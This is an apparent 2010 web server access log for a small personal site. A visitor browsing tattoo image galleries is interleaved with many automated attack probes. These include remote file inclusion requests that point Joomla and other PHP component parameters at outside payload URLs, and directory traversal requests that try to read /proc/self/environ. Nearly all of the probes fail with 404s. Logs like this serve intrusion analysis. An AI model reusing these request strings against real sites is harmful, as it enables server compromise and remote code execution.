92.48.207.112 - - [07/Jun/2010:07:42:50 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
75.25.154.162 - - [07/Jun/2010:07:43:11 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:07:43:11 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.164.97 - - [07/Jun/2010:07:43:34 -0500] "GET /logs//index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:07:43:35 -0500] "GET //index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
75.25.154.162 - - [07/Jun/2010:07:44:09 -0500] "GET /logs//index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:07:44:09 -0500] "GET //index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.10.135.205 - - [07/Jun/2010:07:44:17 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:17 -0500] "GET //admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:17 -0500] "GET /logs//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:22 -0500] "GET //admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:22 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:23 -0500] "GET /logs//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:39 -0500] "GET /logs/access_log.1271721600//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:44:57 -0500] "GET /logs/access_log.1271721600//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:07:45:05 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:07:45:05 -0500] "GET /logs/phphtml.php?htmlclass_path=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:07:45:05 -0500] "GET /phphtml.php?htmlclass_path=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.121.164.97 - - [07/Jun/2010:07:45:33 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:07:45:33 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:07:45:33 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
92.48.207.112 - - [07/Jun/2010:07:45:56 -0500] "GET /logs/access_log.1270771200//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.236.47.182 - - [07/Jun/2010:07:46:42 -0500] "GET /logs/access_log.1271548800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
222.236.47.182 - - [07/Jun/2010:07:46:42 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.236.47.182 - - [07/Jun/2010:07:46:42 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:07:47:52 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:07:47:52 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:07:47:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.209.177.98 - - [07/Jun/2010:07:48:21 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:48:22 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:48:25 -0500] "GET /logs//index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:48:25 -0500] "GET //index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:07:48:38 -0500] "GET /logs/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:38 -0500] "GET /?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:38 -0500] "GET /logs/access_log.1271030400/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:38 -0500] "GET /logs/access_log.1271203200/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:41 -0500] "GET /?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:41 -0500] "GET /logs/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:42 -0500] "GET /logs/access_log.1271030400/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:07:48:42 -0500] "GET /logs/access_log.1271203200/?sourcedir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.13.52 - - [07/Jun/2010:07:49:05 -0500] "GET /logs/access_log.1250899200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.18.137.210 - - [07/Jun/2010:07:50:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:07:50:49 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:07:50:49 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.209.177.98 - - [07/Jun/2010:07:53:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:53:27 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:53:27 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
114.200.199.236 - - [07/Jun/2010:07:55:27 -0500] "GET /logs/access_log.1271548800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 384 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:07:55:27 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:07:55:27 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.209.177.98 - - [07/Jun/2010:07:56:02 -0500] "GET /logs/access_log.1274832000//index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:56:02 -0500] "GET //index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:07:56:02 -0500] "GET /logs//index.php2?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.46.195.232 - - [07/Jun/2010:08:01:35 -0500] "GET /logs/access_log.1212883200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.155.0.82 - - [07/Jun/2010:08:05:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.14.126.220 - - [07/Jun/2010:08:05:29 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:30 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:31 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:31 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:31 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:35 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:50 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:51 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:51 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:51 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:05:51 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:00 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:03 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:04 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:05 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:05 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
86.155.0.82 - - [07/Jun/2010:08:06:05 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
82.99.38.11 - - [07/Jun/2010:08:06:29 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
216.14.126.220 - - [07/Jun/2010:08:09:00 -0500] "GET //index.php?option=com_galleria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:08:13:55 -0500] "GET /logs//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:08:13:55 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
82.99.38.11 - - [07/Jun/2010:08:14:19 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.99.38.11 - - [07/Jun/2010:08:14:20 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
216.14.126.220 - - [07/Jun/2010:08:14:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:08:14:56 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:08:14:56 -0500] "GET /logs//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
174.121.77.90 - - [07/Jun/2010:08:15:07 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:08:15:08 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
82.99.38.11 - - [07/Jun/2010:08:19:33 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
82.99.38.11 - - [07/Jun/2010:08:19:33 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
82.99.38.11 - - [07/Jun/2010:08:19:33 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
67.195.112.180 - - [07/Jun/2010:08:21:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [07/Jun/2010:08:21:09 -0500] "GET /logs/access_log.1206489600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.200 - - [07/Jun/2010:08:22:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.167.25 - - [07/Jun/2010:08:22:21 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:22:21 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
